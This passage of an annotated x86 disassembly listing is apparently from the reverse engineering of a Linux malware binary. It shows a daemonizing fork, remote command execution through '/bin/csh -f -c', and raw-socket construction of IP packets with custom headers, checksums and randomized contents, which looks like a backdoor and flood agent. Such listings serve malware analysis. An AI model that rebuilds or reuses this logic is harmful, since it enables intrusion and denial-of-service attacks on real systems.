|||||||||||||||| 08048a98: call 0x0804a2a8 |||||||||||||||| 08048a9d: push $0x0 |||||||||||||||| # Possible reference to rodata 'sh' 08048a9f: push $0x806766a |||||||||||||||| # Possible reference to rodata '/bin/sh' 08048aa4: push $0x806766d |||||||||||||||| 08048aa9: call 0x080555fc |||||||||||||||| 08048aae: mov -0x44cc(%ebp),%ecx |||||||||||||||| 08048ab4: push %ecx |||||||||||||||| 08048ab5: call 0x08057160 <__libc_close> |||||||||||||||| 08048aba: add $0x20,%esp |||||||||||||||| 08048abd: push $0x0 |||||||||||||||| 08048abf: call 0x08055fbc |||||||||||||||| 08048ac4: push $0x0 *||||||||||||||| 08048ac6: call 0x08055fbc ||||||||||||||| 08048acb: nop ||||||||||||||| 08048acc: call 0x080571e8 <__libc_fork> ||||||||||||||| # Possible reference to data in bss 08048ad1: mov %eax,0x807e770 ||||||||||||||| 08048ad6: test %eax,%eax ||||||||||||||| 08048ad8: jne 0x08048eb8 *||||||||||||||| 08048ade: call 0x0805733c <__libc_setsid> |||||||||||||||| 08048ae3: push $0x1 |||||||||||||||| 08048ae5: push $0x11 |||||||||||||||| 08048ae7: call 0x080569bc |||||||||||||||| 08048aec: call 0x080571e8 <__libc_fork> |||||||||||||||| 08048af1: add $0x8,%esp |||||||||||||||| 08048af4: test %eax,%eax |||||||||||||||| 08048af6: je 0x08048b18 *|||||||||||||||| 08048af8: push $0x4b0 ||||||||||||||||| 08048afd: call 0x080556cc ||||||||||||||||| 08048b02: push $0x9 ||||||||||||||||| # Possible reference to data in bss 08048b04: mov 0x807e770,%eax ||||||||||||||||| 08048b09: push %eax ||||||||||||||||| 08048b0a: call 0x080572b0 <__libc_kill> ||||||||||||||||| 08048b0f: push $0x0 ||||||||||||||||| 08048b11: call 0x08055fbc ||||||||||||||||| 08048b16: lea (%esi),%esi ||||||||||||||||| 08048b18: xor %ebx,%ebx *|||||||||||||||| 08048b1a: lea (%esi),%esi |||||||||||||||| 08048b1c: mov -0xffe(%ebx,%ebp,1),%al *|||||||||||||||| 08048b23: mov %al,-0x1000(%ebx,%ebp,1) ||||||||||||||||| 08048b2a: inc %ebx ||||||||||||||||| 08048b2b: cmp $0x18d,%ebx ||||||||||||||||| 08048b31: jle 0x08048b1c *|||||||||||||||| 08048b33: mov -0x44e0(%ebp),%edx |||||||||||||||| 08048b39: push %edx |||||||||||||||| # Possible reference to rodata '/bin/csh -f -c "%s" ' 08048b3a: push $0x8067675 |||||||||||||||| 08048b3f: lea -0x800(%ebp),%ebx |||||||||||||||| 08048b45: push %ebx |||||||||||||||| 08048b46: call 0x0804f808 <_IO_sprintf> |||||||||||||||| 08048b4b: push %ebx |||||||||||||||| 08048b4c: call 0x080557e8 |||||||||||||||| 08048b51: push $0x0 |||||||||||||||| 08048b53: call 0x08057554 <_exit> |||||||||||||||| # Possible reference to data in bss 08048b58: mov 0x807e774,%eax |||||||||||||||| 08048b5d: test %eax,%eax |||||||||||||||| 08048b5f: je 0x08048eb8 *|||||||||||||||| 08048b65: push $0x9 ||||||||||||||||| 08048b67: push %eax ||||||||||||||||| 08048b68: call 0x080572b0 <__libc_kill> ||||||||||||||||| # Possible reference to data in bss 08048b6d: movl $0x0,0x807e774 ||||||||||||||||| 08048b77: add $0x8,%esp ||||||||||||||||| 08048b7a: jmp 0x08048eb8 *||||||||||||||||| 08048b7f: nop |||||||||||||||||| # Possible reference to data in bss 08048b80: cmpl $0x0,0x807e774 |||||||||||||||||| 08048b87: jne 0x08048eb8 *|||||||||||||||||| # Possible reference to data in bss 08048b8d: movl $0x9,0x807e778 ||||||||||||||||||| 08048b97: call 0x080571e8 <__libc_fork> ||||||||||||||||||| # Possible reference to data in bss 08048b9c: mov %eax,0x807e774 ||||||||||||||||||| 08048ba1: test %eax,%eax ||||||||||||||||||| 08048ba3: jne 0x08048eb8 *||||||||||||||||||| 08048ba9: lea -0x44bc(%ebp),%edi |||||||||||||||||||| 08048baf: lea -0x1000(%ebp),%esi |||||||||||||||||||| 08048bb5: cld |||||||||||||||||||| 08048bb6: mov $0x3f,%ecx |||||||||||||||||||| 08048bbb: repz movsl %ds:(%esi),%es:(%edi) |||||||||||||||||||| 08048bbd: movsw %ds:(%esi),%es:(%edi) |||||||||||||||||||| 08048bbf: movsb %ds:(%esi),%es:(%edi) |||||||||||||||||||| 08048bc0: xor %ebx,%ebx |||||||||||||||||||| 08048bc2: lea (%esi),%esi |||||||||||||||||||| 08048bc4: mov -0x44b2(%ebx,%ebp,1),%al *|||||||||||||||||||| 08048bcb: mov %al,-0x44bc(%ebx,%ebp,1) ||||||||||||||||||||| 08048bd2: inc %ebx ||||||||||||||||||||| 08048bd3: cmp $0xfe,%ebx ||||||||||||||||||||| 08048bd9: jle 0x08048bc4 *|||||||||||||||||||| 08048bdb: lea -0x44bc(%ebp),%eax |||||||||||||||||||| 08048be1: push %eax |||||||||||||||||||| 08048be2: movzbl -0xff7(%ebp),%eax |||||||||||||||||||| 08048be9: push %eax |||||||||||||||||||| 08048bea: movzbl -0xff8(%ebp),%eax |||||||||||||||||||| 08048bf1: push %eax |||||||||||||||||||| 08048bf2: movzbl -0xff9(%ebp),%eax |||||||||||||||||||| 08048bf9: push %eax |||||||||||||||||||| 08048bfa: movzbl -0xffa(%ebp),%eax |||||||||||||||||||| 08048c01: push %eax |||||||||||||||||||| 08048c02: movzbl -0xffb(%ebp),%eax |||||||||||||||||||| 08048c09: push %eax |||||||||||||||||||| 08048c0a: movzbl -0xffc(%ebp),%eax |||||||||||||||||||| 08048c11: push %eax |||||||||||||||||||| 08048c12: movzbl -0xffd(%ebp),%eax |||||||||||||||||||| 08048c19: push %eax |||||||||||||||||||| 08048c1a: movzbl -0xffe(%ebp),%eax |||||||||||||||||||| 08048c21: push %eax |||||||||||||||||||| 08048c22: call 0x08049174 |||||||||||||||||||| 08048c27: add $0x24,%esp |||||||||||||||||||| 08048c2a: push $0x0 |||||||||||||||||||| 08048c2c: call 0x08057554 <_exit> |||||||||||||||||||| 08048c31: lea 0x0(%esi),%esi |||||||||||||||||||| # Possible reference to data in bss 08048c34: cmpl $0x0,0x807e774 |||||||||||||||||||| 08048c3b: jne 0x08048eb8 *|||||||||||||||||||| # Possible reference to data in bss 08048c41: movl $0xa,0x807e778 ||||||||||||||||||||| 08048c4b: call 0x080571e8 <__libc_fork> ||||||||||||||||||||| # Possible reference to data in bss 08048c50: mov %eax,0x807e774 ||||||||||||||||||||| 08048c55: test %eax,%eax ||||||||||||||||||||| 08048c57: jne 0x08048eb8 *||||||||||||||||||||| 08048c5d: lea -0x44bc(%ebp),%edi |||||||||||||||||||||| 08048c63: lea -0x1000(%ebp),%esi |||||||||||||||||||||| 08048c69: cld |||||||||||||||||||||| 08048c6a: mov $0x3f,%ecx |||||||||||||||||||||| 08048c6f: repz movsl %ds:(%esi),%es:(%edi) |||||||||||||||||||||| 08048c71: movsw %ds:(%esi),%es:(%edi) |||||||||||||||||||||| 08048c73: movsb %ds:(%esi),%es:(%edi) |||||||||||||||||||||| 08048c74: xor %ebx,%ebx |||||||||||||||||||||| 08048c76: lea (%esi),%esi |||||||||||||||||||||| 08048c78: mov -0x44ae(%ebx,%ebp,1),%al *|||||||||||||||||||||| 08048c7f: mov %al,-0x44bc(%ebx,%ebp,1) ||||||||||||||||||||||| 08048c86: inc %ebx ||||||||||||||||||||||| 08048c87: cmp $0xfe,%ebx ||||||||||||||||||||||| 08048c8d: jle 0x08048c78 *|||||||||||||||||||||| 08048c8f: lea -0x44bc(%ebp),%eax |||||||||||||||||||||| 08048c95: push %eax |||||||||||||||||||||| 08048c96: movzbl -0xff3(%ebp),%eax |||||||||||||||||||||| 08048c9d: push %eax |||||||||||||||||||||| 08048c9e: push $0x0 |||||||||||||||||||||| 08048ca0: movzbl -0xff4(%ebp),%eax |||||||||||||||||||||| 08048ca7: push %eax |||||||||||||||||||||| 08048ca8: movzbl -0xff5(%ebp),%eax |||||||||||||||||||||| 08048caf: push %eax |||||||||||||||||||||| 08048cb0: movzbl -0xff6(%ebp),%eax |||||||||||||||||||||| 08048cb7: push %eax |||||||||||||||||||||| 08048cb8: movzbl -0xff7(%ebp),%eax |||||||||||||||||||||| 08048cbf: push %eax |||||||||||||||||||||| 08048cc0: movzbl -0xff8(%ebp),%eax |||||||||||||||||||||| 08048cc7: push %eax |||||||||||||||||||||| 08048cc8: movzbl -0xff9(%ebp),%eax |||||||||||||||||||||| 08048ccf: push %eax |||||||||||||||||||||| 08048cd0: movzbl -0xffa(%ebp),%eax |||||||||||||||||||||| 08048cd7: push %eax |||||||||||||||||||||| 08048cd8: movzbl -0xffb(%ebp),%eax |||||||||||||||||||||| 08048cdf: push %eax |||||||||||||||||||||| 08048ce0: movzbl -0xffc(%ebp),%eax |||||||||||||||||||||| 08048ce7: push %eax |||||||||||||||||||||| 08048ce8: movzbl -0xffd(%ebp),%eax |||||||||||||||||||||| 08048cef: push %eax |||||||||||||||||||||| 08048cf0: movzbl -0xffe(%ebp),%eax |||||||||||||||||||||| 08048cf7: push %eax |||||||||||||||||||||| 08048cf8: call 0x08049d40 |||||||||||||||||||||| 08048cfd: add $0x38,%esp |||||||||||||||||||||| 08048d00: push $0x0 |||||||||||||||||||||| 08048d02: call 0x08057554 <_exit> |||||||||||||||||||||| 08048d07: nop |||||||||||||||||||||| # Possible reference to data in bss 08048d08: cmpl $0x0,0x807e774 |||||||||||||||||||||| 08048d0f: jne 0x08048eb8 *|||||||||||||||||||||| # Possible reference to data in bss 08048d15: movl $0xb,0x807e778 ||||||||||||||||||||||| 08048d1f: call 0x080571e8 <__libc_fork> ||||||||||||||||||||||| # Possible reference to data in bss 08048d24: mov %eax,0x807e774 ||||||||||||||||||||||| 08048d29: test %eax,%eax ||||||||||||||||||||||| 08048d2b: jne 0x08048eb8 *||||||||||||||||||||||| 08048d31: lea -0x44bc(%ebp),%edi |||||||||||||||||||||||| 08048d37: lea -0x1000(%ebp),%esi |||||||||||||||||||||||| 08048d3d: cld |||||||||||||||||||||||| 08048d3e: mov $0x3f,%ecx |||||||||||||||||||||||| 08048d43: repz movsl %ds:(%esi),%es:(%edi) |||||||||||||||||||||||| 08048d45: movsw %ds:(%esi),%es:(%edi) |||||||||||||||||||||||| 08048d47: movsb %ds:(%esi),%es:(%edi) |||||||||||||||||||||||| 08048d48: xor %ebx,%ebx |||||||||||||||||||||||| 08048d4a: lea (%esi),%esi |||||||||||||||||||||||| 08048d4c: mov -0x44ad(%ebx,%ebp,1),%al *|||||||||||||||||||||||| 08048d53: mov %al,-0x44bc(%ebx,%ebp,1) ||||||||||||||||||||||||| 08048d5a: inc %ebx ||||||||||||||||||||||||| 08048d5b: cmp $0xfe,%ebx ||||||||||||||||||||||||| 08048d61: jle 0x08048d4c *|||||||||||||||||||||||| 08048d63: lea -0x44bc(%ebp),%eax |||||||||||||||||||||||| 08048d69: push %eax |||||||||||||||||||||||| 08048d6a: movzbl -0xff2(%ebp),%eax |||||||||||||||||||||||| 08048d71: push %eax |||||||||||||||||||||||| 08048d72: movzbl -0xff3(%ebp),%eax |||||||||||||||||||||||| 08048d79: push %eax |||||||||||||||||||||||| 08048d7a: movzbl -0xff4(%ebp),%eax |||||||||||||||||||||||| 08048d81: push %eax |||||||||||||||||||||||| 08048d82: movzbl -0xff5(%ebp),%eax |||||||||||||||||||||||| 08048d89: push %eax |||||||||||||||||||||||| 08048d8a: movzbl -0xff6(%ebp),%eax |||||||||||||||||||||||| 08048d91: push %eax |||||||||||||||||||||||| 08048d92: movzbl -0xff7(%ebp),%eax |||||||||||||||||||||||| 08048d99: push %eax |||||||||||||||||||||||| 08048d9a: movzbl -0xff8(%ebp),%eax |||||||||||||||||||||||| 08048da1: push %eax |||||||||||||||||||||||| 08048da2: movzbl -0xff9(%ebp),%eax |||||||||||||||||||||||| 08048da9: push %eax |||||||||||||||||||||||| 08048daa: movzbl -0xffa(%ebp),%eax |||||||||||||||||||||||| 08048db1: push %eax |||||||||||||||||||||||| 08048db2: movzbl -0xffb(%ebp),%eax |||||||||||||||||||||||| 08048db9: push %eax |||||||||||||||||||||||| 08048dba: movzbl -0xffc(%ebp),%eax |||||||||||||||||||||||| 08048dc1: push %eax |||||||||||||||||||||||| 08048dc2: movzbl -0xffd(%ebp),%eax |||||||||||||||||||||||| 08048dc9: push %eax |||||||||||||||||||||||| 08048dca: movzbl -0xffe(%ebp),%eax |||||||||||||||||||||||| 08048dd1: push %eax |||||||||||||||||||||||| 08048dd2: call 0x08049d40 |||||||||||||||||||||||| 08048dd7: add $0x38,%esp |||||||||||||||||||||||| 08048dda: push $0x0 |||||||||||||||||||||||| 08048ddc: call 0x08057554 <_exit> |||||||||||||||||||||||| 08048de1: lea 0x0(%esi),%esi |||||||||||||||||||||||| # Possible reference to data in bss 08048de4: cmpl $0x0,0x807e774 |||||||||||||||||||||||| 08048deb: jne 0x08048eb8 *|||||||||||||||||||||||| # Possible reference to data in bss 08048df1: movl $0xc,0x807e778 ||||||||||||||||||||||||| 08048dfb: call 0x080571e8 <__libc_fork> ||||||||||||||||||||||||| # Possible reference to data in bss 08048e00: mov %eax,0x807e774 ||||||||||||||||||||||||| 08048e05: test %eax,%eax ||||||||||||||||||||||||| 08048e07: jne 0x08048eb8 *||||||||||||||||||||||||| 08048e0d: lea -0x44bc(%ebp),%edi |||||||||||||||||||||||||| 08048e13: lea -0x1000(%ebp),%esi |||||||||||||||||||||||||| 08048e19: cld |||||||||||||||||||||||||| 08048e1a: mov $0x3f,%ecx |||||||||||||||||||||||||| 08048e1f: repz movsl %ds:(%esi),%es:(%edi) |||||||||||||||||||||||||| 08048e21: movsw %ds:(%esi),%es:(%edi) |||||||||||||||||||||||||| 08048e23: movsb %ds:(%esi),%es:(%edi) |||||||||||||||||||||||||| 08048e24: xor %ebx,%ebx |||||||||||||||||||||||||| 08048e26: lea (%esi),%esi |||||||||||||||||||||||||| 08048e28: mov -0x44ae(%ebx,%ebp,1),%al *|||||||||||||||||||||||||| 08048e2f: mov %al,-0x44bc(%ebx,%ebp,1) ||||||||||||||||||||||||||| 08048e36: inc %ebx ||||||||||||||||||||||||||| 08048e37: cmp $0xfe,%ebx ||||||||||||||||||||||||||| 08048e3d: jle 0x08048e28 *|||||||||||||||||||||||||| 08048e3f: lea -0x44bc(%ebp),%eax |||||||||||||||||||||||||| 08048e45: push %eax |||||||||||||||||||||||||| 08048e46: movzbl -0xff3(%ebp),%eax |||||||||||||||||||||||||| 08048e4d: push %eax |||||||||||||||||||||||||| 08048e4e: movzbl -0xff4(%ebp),%eax |||||||||||||||||||||||||| 08048e55: push %eax |||||||||||||||||||||||||| 08048e56: movzbl -0xff5(%ebp),%eax |||||||||||||||||||||||||| 08048e5d: push %eax |||||||||||||||||||||||||| 08048e5e: movzbl -0xff6(%ebp),%eax |||||||||||||||||||||||||| 08048e65: push %eax |||||||||||||||||||||||||| 08048e66: movzbl -0xff7(%ebp),%eax |||||||||||||||||||||||||| 08048e6d: push %eax |||||||||||||||||||||||||| 08048e6e: movzbl -0xff8(%ebp),%eax |||||||||||||||||||||||||| 08048e75: push %eax |||||||||||||||||||||||||| 08048e76: movzbl -0xff9(%ebp),%eax |||||||||||||||||||||||||| 08048e7d: push %eax |||||||||||||||||||||||||| 08048e7e: movzbl -0xffa(%ebp),%eax |||||||||||||||||||||||||| 08048e85: push %eax |||||||||||||||||||||||||| 08048e86: movzbl -0xffb(%ebp),%eax |||||||||||||||||||||||||| 08048e8d: push %eax |||||||||||||||||||||||||| 08048e8e: movzbl -0xffc(%ebp),%eax |||||||||||||||||||||||||| 08048e95: push %eax |||||||||||||||||||||||||| 08048e96: movzbl -0xffd(%ebp),%eax |||||||||||||||||||||||||| 08048e9d: push %eax |||||||||||||||||||||||||| 08048e9e: movzbl -0xffe(%ebp),%eax |||||||||||||||||||||||||| 08048ea5: push %eax |||||||||||||||||||||||||| 08048ea6: call 0x08049564 |||||||||||||||||||||||||| 08048eab: add $0x34,%esp |||||||||||||||||||||||||| 08048eae: push $0x0 |||||||||||||||||||||||||| 08048eb0: call 0x08057554 <_exit> |||||||||||||||||||||||||| 08048eb5: lea 0x0(%esi),%esi |||||||||||||||||||||||||| 08048eb8: push $0x2710 *************************| 08048ebd: call 0x080555b0 | 08048ec2: add $0x4,%esp | 08048ec5: jmp 0x080482b0 * 08048eca: lea (%esi),%esi # 08048ecc : 08048ecc: push %ebp 08048ecd: mov %esp,%ebp 08048ecf: push %edi 08048ed0: push %esi 08048ed1: push %ebx 08048ed2: mov 0x8(%ebp),%eax 08048ed5: mov 0x10(%ebp),%edi # Possible reference to data in bss 08048ed8: cmpl $0x0,0x807e784 08048edf: je 0x08048f10 * 08048ee1: mov %eax,%ebx | 08048ee3: lea 0x24(%ebx),%esi | 08048ee6: lea (%esi),%esi | 08048ee8: push $0xfa0 *| 08048eed: call 0x080555b0 || 08048ef2: push %edi || 08048ef3: mov 0xc(%ebp),%edx || 08048ef6: push %edx || 08048ef7: push %ebx || # Possible reference to data in bss 08048ef8: push $0x807e780 || 08048efd: call 0x08048f94 || 08048f02: add $0x14,%esp || 08048f05: add $0x4,%ebx || 08048f08: cmp %esi,%ebx || 08048f0a: jle 0x08048ee8 *| 08048f0c: jmp 0x08048f20 *| 08048f0e: lea (%esi),%esi || 08048f10: push %edi |* 08048f11: mov 0xc(%ebp),%edx | 08048f14: push %edx | 08048f15: push %eax | # Possible reference to data in bss 08048f16: push $0x807e780 | 08048f1b: call 0x08048f94 | 08048f20: mov $0x1,%eax * 08048f25: lea -0xc(%ebp),%esp 08048f28: pop %ebx 08048f29: pop %esi 08048f2a: pop %edi 08048f2b: mov %ebp,%esp 08048f2d: pop %ebp 08048f2e: ret 08048f2f: nop 08048f30: push %ebp 08048f31: mov %esp,%ebp 08048f33: sub $0x4,%esp 08048f36: push %ebx 08048f37: mov 0xc(%ebp),%edx 08048f3a: mov 0x8(%ebp),%ebx 08048f3d: xor %ecx,%ecx 08048f3f: movw $0x0,-0x2(%ebp) 08048f45: cmp $0x1,%edx 08048f48: jle 0x08048f5c * 08048f4a: lea (%esi),%esi | 08048f4c: movzwl (%ebx),%eax *| 08048f4f: add %eax,%ecx || 08048f51: add $0x2,%ebx || 08048f54: add $-0x2,%edx || 08048f57: cmp $0x1,%edx || 08048f5a: jg 0x08048f4c *| 08048f5c: cmp $0x1,%edx * 08048f5f: jne 0x08048f6c * 08048f61: mov (%ebx),%al | 08048f63: mov %al,-0x2(%ebp) | 08048f66: movzwl -0x2(%ebp),%eax | 08048f6a: add %eax,%ecx | 08048f6c: mov %ecx,%edx * 08048f6e: sar $0x10,%edx 08048f71: movzwl %cx,%eax 08048f74: lea (%eax,%edx,1),%ecx 08048f77: mov %ecx,%eax 08048f79: sar $0x10,%eax 08048f7c: add %eax,%ecx 08048f7e: mov %ecx,%eax 08048f80: not %ax 08048f83: mov %ax,-0x2(%ebp) 08048f87: and $0xffff,%eax 08048f8c: mov -0x8(%ebp),%ebx 08048f8f: mov %ebp,%esp 08048f91: pop %ebp 08048f92: ret 08048f93: nop # 08048f94 : 08048f94: push %ebp 08048f95: mov %esp,%ebp 08048f97: sub $0x44,%esp 08048f9a: push %edi 08048f9b: push %esi 08048f9c: push %ebx 08048f9d: mov 0xc(%ebp),%ebx 08048fa0: push $0xff 08048fa5: push $0x3 08048fa7: push $0x2 08048fa9: call 0x08056cf4 08048fae: mov %eax,-0x44(%ebp) 08048fb1: add $0xc,%esp 08048fb4: cmp $-0x1,%eax 08048fb7: je 0x08048fce * 08048fb9: mov 0x14(%ebp),%eax | 08048fbc: add $0x17,%eax | 08048fbf: push %eax | 08048fc0: call 0x0805bd74 <__libc_malloc> | 08048fc5: mov %eax,%esi | 08048fc7: add $0x4,%esp | 08048fca: test %esi,%esi | 08048fcc: jne 0x08048fd8 *| 08048fce: xor %eax,%eax |* 08048fd0: jmp 0x0804912c |* 08048fd5: lea 0x0(%esi),%esi || 08048fd8: mov %esi,-0x3c(%ebp) *| 08048fdb: lea 0x14(%esi),%edi | 08048fde: mov %edi,-0x40(%ebp) | 08048fe1: lea 0x16(%esi),%edi | 08048fe4: mov %edi,-0x38(%ebp) | 08048fe7: mov 0x8(%ebp),%edi | 08048fea: mov (%edi),%al | 08048fec: mov %al,0xc(%esi) | 08048fef: mov 0x1(%edi),%al | 08048ff2: mov %al,0xd(%esi) | 08048ff5: mov 0x2(%edi),%al | 08048ff8: mov %al,0xe(%esi) | 08048ffb: mov 0x3(%edi),%al | 08048ffe: mov %al,0xf(%esi) | 08049001: mov (%ebx),%al | 08049003: mov %al,0x10(%esi) | 08049006: mov 0x1(%ebx),%al | 08049009: mov %al,0x11(%esi) | 0804900c: mov 0x2(%ebx),%al | 0804900f: mov %al,0x12(%esi) | 08049012: mov 0x3(%ebx),%al | 08049015: mov %al,0x13(%esi) | 08049018: movzbl 0x3(%ebx),%eax | 0804901c: push %eax | 0804901d: movzbl 0x2(%ebx),%eax | 08049021: push %eax | 08049022: movzbl 0x1(%ebx),%eax | 08049026: push %eax | 08049027: movzbl (%ebx),%eax | 0804902a: push %eax | # Possible reference to rodata '%d.%d.%d.%d' 0804902b: push $0x806768a | 08049030: lea -0x30(%ebp),%ebx | 08049033: push %ebx | 08049034: call 0x0804f808 <_IO_sprintf> | 08049039: push %ebx | 0804903a: call 0x08049138 | 0804903f: mov %eax,-0xc(%ebp) | 08049042: movw $0xa,-0xe(%ebp) | 08049048: movw $0x2,-0x10(%ebp) | 0804904e: movb $0x45,(%esi) | 08049051: movb $0xfa,0x8(%esi) | 08049055: movb $0xb,0x9(%esi) | 08049059: add $0x1c,%esp | 0804905c: mov 0x14(%ebp),%ax | 08049060: add $0x16,%ax | 08049064: xchg %al,%ah | 08049066: mov %ax,0x2(%esi) | 0804906a: movb $0x0,0x1(%esi) | 0804906e: call 0x08056058 | 08049073: xchg %al,%ah | 08049075: mov %ax,0x4(%esi) | 08049079: movw $0x0,0x6(%esi) | 0804907f: movw $0x0,0xa(%esi) | 08049085: mov $0x14,%edx | 0804908a: mov %esi,%ecx | 0804908c: xor %ebx,%ebx | 0804908e: movw $0x0,-0x32(%ebp) | 08049094: movzwl (%ecx),%eax *| 08049097: add %eax,%ebx || 08049099: add $0x2,%ecx || 0804909c: add $-0x2,%edx || 0804909f: cmp $0x1,%edx || 080490a2: jg 0x08049094 *| 080490a4: jne 0x080490b1 *| 080490a6: mov (%ecx),%al || 080490a8: mov %al,-0x32(%ebp) || 080490ab: movzwl -0x32(%ebp),%eax || 080490af: add %eax,%ebx || 080490b1: mov %ebx,%edx *| 080490b3: sar $0x10,%edx | 080490b6: movzwl %bx,%eax | 080490b9: lea (%eax,%edx,1),%ebx | 080490bc: mov %ebx,%eax | 080490be: sar $0x10,%eax | 080490c1: add %eax,%ebx | 080490c3: mov %ebx,%eax | 080490c5: not %ax | 080490c8: mov %ax,-0x32(%ebp) | 080490cc: mov -0x3c(%ebp),%edi | 080490cf: mov %ax,0xa(%edi) | 080490d3: mov -0x40(%ebp),%edi | 080490d6: movb $0x3,(%edi) | 080490d9: mov 0x14(%ebp),%edi | 080490dc: push %edi | 080490dd: mov 0x10(%ebp),%edi | 080490e0: push %edi | 080490e1: mov -0x38(%ebp),%edi | 080490e4: push %edi | 080490e5: call 0x0805652c | 080490ea: add $0xc,%esp | 080490ed: push $0x10 | 080490ef: lea -0x10(%ebp),%eax | 080490f2: push %eax | 080490f3: push $0x0 | 080490f5: mov 0x14(%ebp),%eax | 080490f8: add $0x16,%eax | 080490fb: push %eax | 080490fc: push %esi | 080490fd: mov -0x44(%ebp),%edi | 08049100: push %edi | 08049101: call 0x08056c3c | 08049106: add $0x18,%esp | 08049109: cmp $-0x1,%eax | 0804910c: jne 0x08049118 * | 0804910e: push %esi | | 0804910f: call 0x0805c290 <__libc_free> | | 08049114: xor %eax,%eax | | 08049116: jmp 0x0804912c |*| 08049118: mov -0x44(%ebp),%edi *|| 0804911b: push %edi || 0804911c: call 0x08057160 <__libc_close> || 08049121: push %esi || 08049122: call 0x0805c290 <__libc_free> || 08049127: mov $0x1,%eax || 0804912c: lea -0x50(%ebp),%esp ** 0804912f: pop %ebx 08049130: pop %esi 08049131: pop %edi 08049132: mov %ebp,%esp 08049134: pop %ebp 08049135: ret 08049136: lea (%esi),%esi # 08049138 : 08049138: push %ebp 08049139: mov %esp,%ebp 0804913b: mov 0x8(%ebp),%eax 0804913e: push %eax 0804913f: call 0x0804bf80 08049144: mov %eax,%ecx 08049146: add $0x4,%esp 08049149: test %ecx,%ecx 0804914b: je 0x0804916c * 0804914d: mov 0x10(%ecx),%eax | 08049150: mov (%eax),%edx | 08049152: mov 0xc(%ecx),%eax | 08049155: push %eax | 08049156: push %edx | # Possible reference to data in bss 08049157: push $0x80792bc | 0804915c: call 0x0805652c | # Possible reference to data in bss 08049161: mov 0x80792bc,%eax | 08049166: mov %ebp,%esp | 08049168: pop %ebp | 08049169: ret | 0804916a: lea (%esi),%esi | 0804916c: xor %eax,%eax * 0804916e: mov %ebp,%esp 08049170: pop %ebp 08049171: ret 08049172: lea (%esi),%esi # 08049174 : 08049174: push %ebp 08049175: mov %esp,%ebp 08049177: sub $0x674,%esp 0804917d: push %edi 0804917e: push %esi 0804917f: push %ebx 08049180: mov 0x8(%ebp),%bl 08049183: mov %bl,-0x644(%ebp) 08049189: mov 0xc(%ebp),%bl 0804918c: mov %bl,-0x648(%ebp) 08049192: mov 0x10(%ebp),%bl 08049195: mov %bl,-0x64c(%ebp) 0804919b: mov 0x14(%ebp),%bl 0804919e: mov %bl,-0x650(%ebp) 080491a4: lea -0x24(%ebp),%edi # Possible reference to rodata '' 080491a7: mov $0x8067698,%esi 080491ac: cld 080491ad: mov $0x9,%ecx 080491b2: repz movsl %ds:(%esi),%es:(%edi) 080491b4: movl $0x1,-0x654(%ebp) 080491be: lea -0x218(%ebp),%edi # Possible reference to rodata 'Gn' 080491c4: mov $0x80676bc,%esi 080491c9: cld 080491ca: mov $0x7d,%ecx 080491cf: repz movsl %ds:(%esi),%es:(%edi) 080491d1: lea -0x638(%ebp),%esi 080491d7: lea -0x624(%ebp),%ebx 080491dd: mov %ebx,-0x65c(%ebp) 080491e3: lea -0x61c(%ebp),%ebx 080491e9: mov %ebx,-0x660(%ebp) 080491ef: movw $0x2,-0x228(%ebp) 080491f8: movw $0x0,-0x226(%ebp) 08049201: cmpl $0x0,0x18(%ebp) 08049205: je 0x0804920a * 08049207: decl 0x18(%ebp) | 0804920a: push $0xff * 0804920f: push $0x3 08049211: push $0x2 08049213: call 0x08056cf4 08049218: mov %eax,-0x658(%ebp) 0804921e: add $0xc,%esp 08049221: test %eax,%eax 08049223: jle 0x08049548 * 08049229: movl $0x0,-0x664(%ebp) | 08049233: movl $0x0,-0x668(%ebp) | 0804923d: push $0x400 | 08049242: push $0x0 | 08049244: push %esi | 08049245: call 0x08057764 | 0804924a: add $0xc,%esp | 0804924d: lea 0x0(%esi),%esi | 08049250: xor %edi,%edi **| 08049252: cmpl $0x0,0x24(%ebp) ||| 08049256: je 0x080492b2 *||| 08049258: cmpl $0x0,-0x668(%ebp) |||| 0804925f: jg 0x080492b2 *|||| 08049261: mov 0x28(%ebp),%ebx ||||| 08049264: push %ebx ||||| 08049265: call 0x0804bf80 ||||| 0804926a: mov %eax,%edx ||||| 0804926c: add $0x4,%esp ||||| 0804926f: test %edx,%edx ||||| 08049271: jne 0x08049288 * ||||| 08049273: push $0x258 | ||||| 08049278: call 0x080556cc | ||||| 0804927d: mov $0x1,%edi | ||||| 08049282: add $0x4,%esp | ||||| 08049285: jmp 0x080492b2 |*||||| 08049287: nop ||||||| 08049288: push $0x4 *|||||| 0804928a: lea -0x63c(%ebp),%eax |||||| 08049290: push %eax |||||| 08049291: mov 0x10(%edx),%eax |||||| 08049294: mov (%eax),%eax |||||| 08049296: push %eax |||||| 08049297: call 0x08056480 |||||| 0804929c: mov -0x63c(%ebp),%eax |||||| 080492a2: mov %eax,0xc(%esi) |||||| 080492a5: movl $0x9c40,-0x668(%ebp) |||||| 080492af: add $0xc,%esp |||||| 080492b2: test %edi,%edi ***||| 080492b4: jne 0x08049250 *|| 080492b6: xor %edi,%edi || 080492b8: movl $0x0,-0x670(%ebp) || 080492c2: lea (%esi),%esi || 080492c4: cmpl $0x1,-0x654(%ebp) *|| 080492cb: jne 0x080492e8 *||| 080492cd: movl $0x0,-0x654(%ebp) |||| 080492d7: call 0x08055e38 <__random> |||| 080492dc: mov $0x1f40,%ebx |||| 080492e1: cltd |||| 080492e2: idiv %ebx |||| 080492e4: jmp 0x080492ea *|||| 080492e6: lea (%esi),%esi ||||| 080492e8: xor %edx,%edx |*||| # Possible reference to data ' ' 080492ea: cmpl $0x0,0x806d22c(,%edx,4) * ||| 080492f2: je 0x08049530 *||| # Possible reference to data ' ' 080492f8: lea 0x806d22c(,%edx,4),%edx |||| 080492ff: mov %edx,-0x66c(%ebp) |||| 08049305: lea 0x0(%esi),%esi |||| 08049308: mov -0x66c(%ebp),%ebx *|||| 0804930e: mov (%ebx),%eax ||||| 08049310: mov %eax,-0x224(%ebp) ||||| 08049316: mov -0x670(%ebp),%ebx ||||| 0804931c: lea -0x218(%ebp,%ebx,1),%edx ||||| 08049323: mov -0x24(%ebp,%edi,4),%eax ||||| 08049327: push %eax ||||| 08049328: push %edx ||||| 08049329: mov -0x660(%ebp),%ebx ||||| 0804932f: push %ebx ||||| 08049330: call 0x0805652c ||||| 08049335: add $0xc,%esp ||||| 08049338: call 0x08055e38 <__random> ||||| 0804933d: mov $0xff,%ebx ||||| 08049342: cltd ||||| 08049343: idiv %ebx ||||| 08049345: mov -0x660(%ebp),%ebx ||||| 0804934b: mov %dl,(%ebx) ||||| 